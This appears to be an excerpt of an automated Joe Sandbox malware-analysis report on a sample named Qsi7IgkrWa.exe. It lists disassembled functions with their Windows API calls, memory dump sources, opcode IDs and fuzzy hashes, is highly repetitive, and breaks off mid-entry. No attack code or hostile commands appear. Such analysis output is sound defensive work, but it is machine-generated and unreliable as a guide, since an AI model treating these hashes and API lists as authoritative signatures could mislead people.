                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AdjustPointer$_abort
                                        • String ID:
                                        • API String ID: 2252061734-0
                                        • Opcode ID: d740ddc1d05b8b0e8bad6e31607ab03b4b543f48ed5b79acbe8b25116f6d5d9e
                                        • Instruction ID: 5ed940c2aaf30c2d283bf20bab66c35b8551a4a3a3e3216aabc894b6d9b55d1b
                                        • Opcode Fuzzy Hash: d740ddc1d05b8b0e8bad6e31607ab03b4b543f48ed5b79acbe8b25116f6d5d9e
                                        • Instruction Fuzzy Hash: F951CF71601292AFDB299F14D985BAAF7E5FF64310F2841AFE801473A1F732AD41DB90
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 00BDBF39
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BDBF5C
                                          • Part of subcall function 00BD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BDCA2C,00000000,?,00BD6CBE,?,00000008,?,00BD91E0,?,?,?), ref: 00BD8E38
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BDBF82
                                        • _free.LIBCMT ref: 00BDBF95
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BDBFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 67de7b1874d46026d8265fbef55c8ef06b67649c98170f4822f96d65c3b1c1f4
                                        • Instruction ID: 3a541cfcd0ab2df1cc740abfa43b766c1ff87ad5cd2e6cb0397757b4b21a3134
                                        • Opcode Fuzzy Hash: 67de7b1874d46026d8265fbef55c8ef06b67649c98170f4822f96d65c3b1c1f4
                                        • Instruction Fuzzy Hash: 57019E62601211BF272117665C9DC7FAAEDDEC6FA131601AEB904D7340FF608D0185B1
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,00BD91AD,00BDB188,?,00BD9813,00000001,00000364,?,00BD3F73,00000050,?,00BF1030,00000200), ref: 00BD986E
                                        • _free.LIBCMT ref: 00BD98A3
                                        • _free.LIBCMT ref: 00BD98CA
                                        • SetLastError.KERNEL32(00000000,?,00BF1030,00000200), ref: 00BD98D7
                                        • SetLastError.KERNEL32(00000000,?,00BF1030,00000200), ref: 00BD98E0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 82cedd013229c33488963188d45d2b60547f1c0ba21bea8e300b3f4d6432c89c
                                        • Instruction ID: 21a67769901eff44cf52c3a12aee5ff68df0768676b920c39764c2f519669821
                                        • Opcode Fuzzy Hash: 82cedd013229c33488963188d45d2b60547f1c0ba21bea8e300b3f4d6432c89c
                                        • Instruction Fuzzy Hash: FA01F9362446016BC3162724ACC991BA6EADBD3FB1B3101B7F51597392FE32CD01B525
                                        APIs
                                          • Part of subcall function 00BC11CF: ResetEvent.KERNEL32(?), ref: 00BC11E1
                                          • Part of subcall function 00BC11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00BC11F5
                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00BC0F21
                                        • CloseHandle.KERNEL32(?,?), ref: 00BC0F3B
                                        • DeleteCriticalSection.KERNEL32(?), ref: 00BC0F54
                                        • CloseHandle.KERNEL32(?), ref: 00BC0F60
                                        • CloseHandle.KERNEL32(?), ref: 00BC0F6C
                                          • Part of subcall function 00BC0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00BC1206,?), ref: 00BC0FEA
                                          • Part of subcall function 00BC0FE4: GetLastError.KERNEL32(?), ref: 00BC0FF6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                        • String ID:
                                        • API String ID: 1868215902-0
                                        • Opcode ID: 11769c46723d80e397ca278edf663fc69bccb63fc45c60908de2711c424b008e
                                        • Instruction ID: f8f40225d304a40b69f75cc5f3eb91f3e79df18483aabcd40afae4ece1784c4a
                                        • Opcode Fuzzy Hash: 11769c46723d80e397ca278edf663fc69bccb63fc45c60908de2711c424b008e
                                        • Instruction Fuzzy Hash: D6015E72100784EFC722AF65DC88FD6BBE9FB08B10F00096DF26A93161CB757A44CA50
                                        APIs
                                        • _free.LIBCMT ref: 00BDC817
                                          • Part of subcall function 00BD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?), ref: 00BD8DE2
                                          • Part of subcall function 00BD8DCC: GetLastError.KERNEL32(?,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?,?), ref: 00BD8DF4
                                        • _free.LIBCMT ref: 00BDC829
                                        • _free.LIBCMT ref: 00BDC83B
                                        • _free.LIBCMT ref: 00BDC84D
                                        • _free.LIBCMT ref: 00BDC85F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 3c291407e3e3996ee93e847b83cea9ea7490c28952e980b028be690d2942f738
                                        • Instruction ID: 8cdc583625ab94afb7a757f47c733e02be504867a709619af9b12b0f41e010ff
                                        • Opcode Fuzzy Hash: 3c291407e3e3996ee93e847b83cea9ea7490c28952e980b028be690d2942f738
                                        • Instruction Fuzzy Hash: BAF01232504242FB8660DB68E4C5C26FBEAEA44715B541CAFF118DB792EF71FC80DA54
                                        APIs
                                        • _wcslen.LIBCMT ref: 00BC1FE5
                                        • _wcslen.LIBCMT ref: 00BC1FF6
                                        • _wcslen.LIBCMT ref: 00BC2006
                                        • _wcslen.LIBCMT ref: 00BC2014
                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00BBB371,?,?,00000000,?,?,?), ref: 00BC202F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _wcslen$CompareString
                                        • String ID:
                                        • API String ID: 3397213944-0
                                        • Opcode ID: 12d2b3a4c653d5034a420e55f3ee6a5dc29c2676cff0dd6f9007c9a67f18fb6a
                                        • Instruction ID: 909e537dcd520491a5790ee03eb446ceadfba192e95667b8e2f945cc6c128bec
                                        • Opcode Fuzzy Hash: 12d2b3a4c653d5034a420e55f3ee6a5dc29c2676cff0dd6f9007c9a67f18fb6a
                                        • Instruction Fuzzy Hash: B4F06D32008014BBCF261F50EC49E8A7FA6EB40B60B11808AF61A5B0A3DB729661D7A0
                                        APIs
                                        • _free.LIBCMT ref: 00BD891E
                                          • Part of subcall function 00BD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?), ref: 00BD8DE2
                                          • Part of subcall function 00BD8DCC: GetLastError.KERNEL32(?,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?,?), ref: 00BD8DF4
                                        • _free.LIBCMT ref: 00BD8930
                                        • _free.LIBCMT ref: 00BD8943
                                        • _free.LIBCMT ref: 00BD8954
                                        • _free.LIBCMT ref: 00BD8965
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 69bb806f907d4cbeb2e75bfdf294340069388254cd9a41788e5cd51bba8a3636
                                        • Instruction ID: b962c928868c1522abdfdd592fae5280f7ff0464227af9390fed368f75d74b00
                                        • Opcode Fuzzy Hash: 69bb806f907d4cbeb2e75bfdf294340069388254cd9a41788e5cd51bba8a3636
                                        • Instruction Fuzzy Hash: 13F09A7D800126AB86426F24FC0279D7BE2F72A721300429BF0645B3F5EF3689618B80
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _swprintf
                                        • String ID: %ls$%s: %s
                                        • API String ID: 589789837-2259941744
                                        • Opcode ID: 5891bf773ac0058aa475f51c783ec91c60cde0bc47c0276320c8363d4994526c
                                        • Instruction ID: ece38a2ef0846390b618e5d14b342bc23989916ad3782124225c5bc1cbc3948a
                                        • Opcode Fuzzy Hash: 5891bf773ac0058aa475f51c783ec91c60cde0bc47c0276320c8363d4994526c
                                        • Instruction Fuzzy Hash: F051DA7524C300F6E6111A9C8D86F7572E5AB07B04F248DDFF397744E3CAA2A810675B
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Qsi7IgkrWa.exe,00000104), ref: 00BD7FAE
                                        • _free.LIBCMT ref: 00BD8079
                                        • _free.LIBCMT ref: 00BD8083
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\Qsi7IgkrWa.exe
                                        • API String ID: 2506810119-3654394228
                                        • Opcode ID: c89f942280a413a52010920396ecbef488f41e31cee41aa183695c796b21c51c
                                        • Instruction ID: 2843d12745860c750b28de4e4889a667048269f58a8ab64cb89e1a438971630a
                                        • Opcode Fuzzy Hash: c89f942280a413a52010920396ecbef488f41e31cee41aa183695c796b21c51c
                                        • Instruction Fuzzy Hash: F0318F75A00258AFDB25DF959885E9EFBFCEF85311F1040EBF50497351EA708A448B91
                                        APIs
                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BD31FB
                                        • _abort.LIBCMT ref: 00BD3306
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: EncodePointer_abort
                                        • String ID: MOC$RCC
                                        • API String ID: 948111806-2084237596
                                        • Opcode ID: bb263ea094eea0898f4f50f0d8dcc932287f0203661023fa07eb66a7089c1b6c
                                        • Instruction ID: 71e494985842a3612a555c937f07511b3de601506d0d9e22c0fe33799df6fe0e
                                        • Opcode Fuzzy Hash: bb263ea094eea0898f4f50f0d8dcc932287f0203661023fa07eb66a7089c1b6c
                                        • Instruction Fuzzy Hash: BC415971D00209AFCF15DF98CD81AAEBBF5FF48704F18809AF90467212E335AA50DB55
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BB7406
                                          • Part of subcall function 00BB3BBA: __EH_prolog.LIBCMT ref: 00BB3BBF
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00BB74CD
                                          • Part of subcall function 00BB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BB7AAB
                                          • Part of subcall function 00BB7A9C: GetLastError.KERNEL32 ref: 00BB7AF1
                                          • Part of subcall function 00BB7A9C: CloseHandle.KERNEL32(?), ref: 00BB7B00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                        • API String ID: 3813983858-639343689
                                        • Opcode ID: 8222cc89c780aeed46e96da1d6a04d2b6271dac1290575d90ef45b73e5823f89
                                        • Instruction ID: 8ba2a483050b40c8324d12cd04134d0f12a6e355420c7f7af09062c97f67967d
                                        • Opcode Fuzzy Hash: 8222cc89c780aeed46e96da1d6a04d2b6271dac1290575d90ef45b73e5823f89
                                        • Instruction Fuzzy Hash: 3E319271D44248AFDF21EBA48C45FFE7BE9EB59304F044499F405A7292DFB48A44CB61
                                        APIs
                                          • Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
                                          • Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370
                                        • EndDialog.USER32(?,00000001), ref: 00BCAD98
                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00BCADAD
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00BCADC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: ASKNEXTVOL
                                        • API String ID: 445417207-3402441367
                                        • Opcode ID: a70f896be8bbcf01cc6e55c5300f8230522fbf9ddef40d8a739381336a4d3f6a
                                        • Instruction ID: 3b40beb83f48c417ec4e3d768964cb4159f14fc5739ccfde9c69eb7aef598220
                                        • Opcode Fuzzy Hash: a70f896be8bbcf01cc6e55c5300f8230522fbf9ddef40d8a739381336a4d3f6a
                                        • Instruction Fuzzy Hash: FC11B132340204BFD711DF689C49FEA3BE9FB4B74AF0444A4F742EA4A0CB6199059766
                                        APIs
                                        • __fprintf_l.LIBCMT ref: 00BBD954
                                        • _strncpy.LIBCMT ref: 00BBD99A
                                          • Part of subcall function 00BC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00BF1030,00000200,00BBD928,00000000,?,00000050,00BF1030), ref: 00BC1DC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                        • String ID: $%s$@%s
                                        • API String ID: 562999700-834177443
                                        • Opcode ID: 4cc53386f566a3a6fa050ab431df9bd774054965fa92e89532b17be0cb3ce05b
                                        • Instruction ID: 681ca2e643d06359b7dc1c0cdf6a42a96fd7b4afb30ba61d6c41e72e2da39143
                                        • Opcode Fuzzy Hash: 4cc53386f566a3a6fa050ab431df9bd774054965fa92e89532b17be0cb3ce05b
                                        • Instruction Fuzzy Hash: BE215E72540248ABDB21EEA4CC45FEE7BE8EF05704F0405A6F950961A2F7B5D648CB51
                                        APIs
                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00BBAC5A,00000008,?,00000000,?,00BBD22D,?,00000000), ref: 00BC0E85
                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00BBAC5A,00000008,?,00000000,?,00BBD22D,?,00000000), ref: 00BC0E8F
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00BBAC5A,00000008,?,00000000,?,00BBD22D,?,00000000), ref: 00BC0E9F
                                        Strings
                                        • Thread pool initialization failed., xrefs: 00BC0EB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
